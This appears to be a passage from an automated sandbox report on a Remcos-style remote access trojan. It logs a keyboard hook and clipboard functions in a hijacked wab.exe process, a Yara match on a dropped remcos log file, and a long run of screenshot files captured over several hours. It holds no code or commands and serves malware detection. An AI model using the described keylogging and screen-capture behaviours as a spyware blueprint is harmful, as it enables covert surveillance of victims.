Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 13_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 13_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 14_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 15_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.9958487965 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220403.dat entropy: 7.99919032627 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200324.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220505.dat entropy: 7.99908488109 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200424.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220605.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200524.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220706.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200624.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220806.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200724.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220908.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200824.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200924.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201024.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201124.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201224.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184000.dat entropy: 7.99880459382 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201324.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201425.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201525.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201625.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201725.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201825.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201925.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202025.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202125.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202225.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184100.dat entropy: 7.99886726203 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184200.dat entropy: 7.99891651272 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184302.dat entropy: 7.99887330465 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184404.dat entropy: 7.99901786262 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184504.dat entropy: 7.99897130794 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202325.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202425.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202525.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202625.dat entropy: 7.99908328258 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202726.dat entropy: 7.99909450421 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202827.dat entropy: 7.99909450421 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202927.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203027.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203127.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203228.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184614.dat entropy: 7.99895892453 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184715.dat entropy: 7.99894083885 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184815.dat entropy: 7.99917817749 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184915.dat entropy: 7.99909450421 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185015.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185115.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185215.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185316.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185417.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203328.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203428.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203528.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203628.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203728.dat entropy: 7.99892587233 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203828.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203928.dat entropy: 7.99899237099 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204028.dat entropy: 7.99899237099 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204128.dat entropy: 7.99899237099 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204228.dat entropy: 7.99899237099 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185517.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185617.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185718.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185818.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185918.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190018.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190118.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190218.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204328.dat entropy: 7.99899237099 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204429.dat entropy: 7.99899237099 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204530.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204630.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204730.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204830.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204931.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205031.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205131.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205231.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190318.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190419.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190519.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190619.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190719.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190819.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190919.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191019.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191119.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191219.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205331.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205431.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205531.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205631.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205732.dat entropy: 7.99909450421 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205833.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205935.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210035.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210135.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210236.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191319.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191419.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191519.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191620.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191720.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191820.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191920.dat entropy: 7.99908715419 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192020.dat entropy: 7.99909630829 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192120.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192220.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210336.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210436.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210536.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210636.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210736.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210836.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210937.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211037.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211138.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211238.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192320.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192420.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192520.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192620.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192721.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192821.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192921.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193021.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193121.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193221.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211338.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211438.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211538.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211638.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211738.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211839.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211940.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212040.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212140.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212240.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193321.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193421.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193521.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193621.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193721.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193821.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193921.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194022.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194122.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194222.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212340.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212441.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212541.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212641.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212741.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212843.dat entropy: 7.99895537863 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212943.dat entropy: 7.99909630829 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213043.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213143.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213243.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194322.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194422.dat entropy: 7.99896090625 Jump to dropped file
